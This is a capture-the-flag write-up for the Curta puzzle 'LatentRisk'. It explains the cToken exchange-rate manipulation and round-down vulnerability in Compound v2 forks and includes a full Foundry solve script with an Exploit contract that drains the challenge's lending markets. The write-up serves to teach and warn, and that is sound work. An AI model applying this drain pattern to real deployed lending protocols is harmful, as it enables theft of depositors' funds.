Write-up for LatentRisk

ChainLightAuthor

Overview

Numerous projects have suffered exploits due to the round-down vulnerability present in the very early stages of Web 3. This challenge was inspired by an incident that happened in the Compound v2 fork, and it was crafted to inform about potential threats that exist in Compound v2.

Please note that Compound v2 has known about this for a long time, and they've never encountered any problems due to this.

I hope every builder/developer/security researcher acknowledges this latent risk and does not reproduce the same crisis anymore.

Solving the puzzle

Compound v2 utilizes interest-bearing tokens (ibTokens) named cToken to manage lender and borrower positions, which can be managed by comptroller, the controller in Compound v2. However, if you accept cToken as collateral before any issuance of cToken, you can exploit a round-down vulnerability to drain all other underlying assets of cToken.

The root cause is that the exchange rate of cToken can be manipulated at the attacker's will when no liquidity exists, and a round-down occurs in redeemUnderlying(). As a result, an attacker can borrow other underlying assets of cToken without collateral.

If you are interested in learning more, check out our blog post.

Solve script

Check out our solve test below for more details.

Solve.t.sol

1
// SPDX-License-Identifier: UNLICENSED
2
pragma solidity ^0.8.0;
3

4
import "forge-std/Test.sol";
5
import "../src/Curta.sol";
6

7
contract SolveTest is Test {
8
    Puzzle public curta;
9
    Challenge public chall;
10

11
    CurtaToken public CUSD;
12
    CurtaToken public CStUSD;
13
    CurtaToken public CETH;
14
    CurtaToken public CWETH;
15

16
    CErc20Immutable public CCUSD;
17
    CErc20Immutable public CCStUSD;
18
    CErc20Immutable public CCETH;
19
    CErc20Immutable public CCWETH;
20

21
    Comptroller public comptroller;
22

23
    function setUp() public {
24
        curta = new Puzzle();
25
        curta.deploy();
26
    }
27

28
    function testSolve() public {
29
        chall = curta.factories(curta.generate(address(this)));
30

31
        CUSD = chall.CUSD();
32
        CStUSD = chall.CStUSD();
33
        CETH = chall.CETH();
34
        CWETH = chall.CWETH();
35

36
        CCUSD = chall.CCUSD();
37
        CCStUSD = chall.CCStUSD();
38
        CCETH = chall.CCETH();
39
        CCWETH = chall.CCWETH();
40

41
        comptroller = chall.comptroller();
42

43
        Exploit drainCETH1 = new Exploit(address(CCETH), address(CETH), address(chall), 3500 ether);
44
        CWETH.transfer(address(drainCETH1), CWETH.balanceOf(address(this)));
45
        drainCETH1.drain();
46
        CETH.approve(address(CCETH), type(uint256).max);
47
        CCETH.liquidateBorrow(address(drainCETH1), 1, CTokenInterface(CCWETH));
48
        CCWETH.redeem(1);
49

50
        Exploit drainCETH2 = new Exploit(address(CCETH), address(CETH), address(chall), 3500 ether);
51
        CWETH.transfer(address(drainCETH2), CWETH.balanceOf(address(this)));
52
        drainCETH2.drain();
53
        CCETH.liquidateBorrow(address(drainCETH2), 1, CTokenInterface(CCWETH));
54
        CCWETH.redeem(1);
55

56
        Exploit drainCETH3 = new Exploit(address(CCETH), address(CETH), address(chall), 3000 ether);
57
        CWETH.transfer(address(drainCETH3), CWETH.balanceOf(address(this)));
58
        drainCETH3.drain();
59
        CCETH.liquidateBorrow(address(drainCETH3), 1, CTokenInterface(CCWETH));
60
        CCWETH.redeem(1);
61

62
        Exploit drainCUSD = new Exploit(address(CCUSD), address(CUSD), address(chall), 10000 ether);
63
        CWETH.transfer(address(drainCUSD), CWETH.balanceOf(address(this)));
64
        drainCUSD.drain();
65
        CUSD.approve(address(CCUSD), type(uint256).max);
66
        CCUSD.liquidateBorrow(address(drainCUSD), 200, CTokenInterface(CCWETH));
67
        CCWETH.redeem(1);
68

69
        CUSD.transfer(address(uint160(curta.generate(address(this)))), CUSD.balanceOf(address(this)));
70
        CETH.transfer(address(uint160(curta.generate(address(this)))), CETH.balanceOf(address(this)));
71
        CWETH.transfer(address(uint160(curta.generate(address(this)))), CWETH.balanceOf(address(this)));
72

73
        curta.verify(curta.generate(address(this)), uint256(0));
74
    }
75
}
76

77
contract Exploit {
78
    CErc20Immutable target;
79
    CurtaToken targetUnderlying;
80
    CurtaToken CWETH;
81
    CErc20Immutable CCWETH;
82
    Comptroller comptroller;
83

84
    Challenge chall;
85

86
    uint256 borrowAmount;
87

88
    constructor(address _target, address _targetUnderlyng, address _chall, uint256 _borrowAmount) {
89
        target = CErc20Immutable(_target);
90
        targetUnderlying = CurtaToken(_targetUnderlyng);
91
        chall = Challenge(_chall);
92

93
        CWETH = chall.CWETH();
94
        CCWETH = chall.CCWETH();
95

96
        comptroller = chall.comptroller();
97
        borrowAmount = _borrowAmount;
98
    }
99

100
    function drain() external {
101
        CWETH.approve(address(CCWETH), type(uint256).max);
102
        CCWETH.mint(2);
103

104
        address[] memory cToken = new address[](1);
105
        cToken[0] = address(CCWETH);
106
        comptroller.enterMarkets(cToken);
107

108
        CWETH.transfer(address(CCWETH), CWETH.balanceOf(address(this)));
109
        target.borrow(borrowAmount);
110
        CCWETH.redeemUnderlying(10000 ether - 1);
111

112
        targetUnderlying.transfer(msg.sender, targetUnderlying.balanceOf(address(this)));
113
        CWETH.transfer(msg.sender, CWETH.balanceOf(address(this)));
114
    }
115
}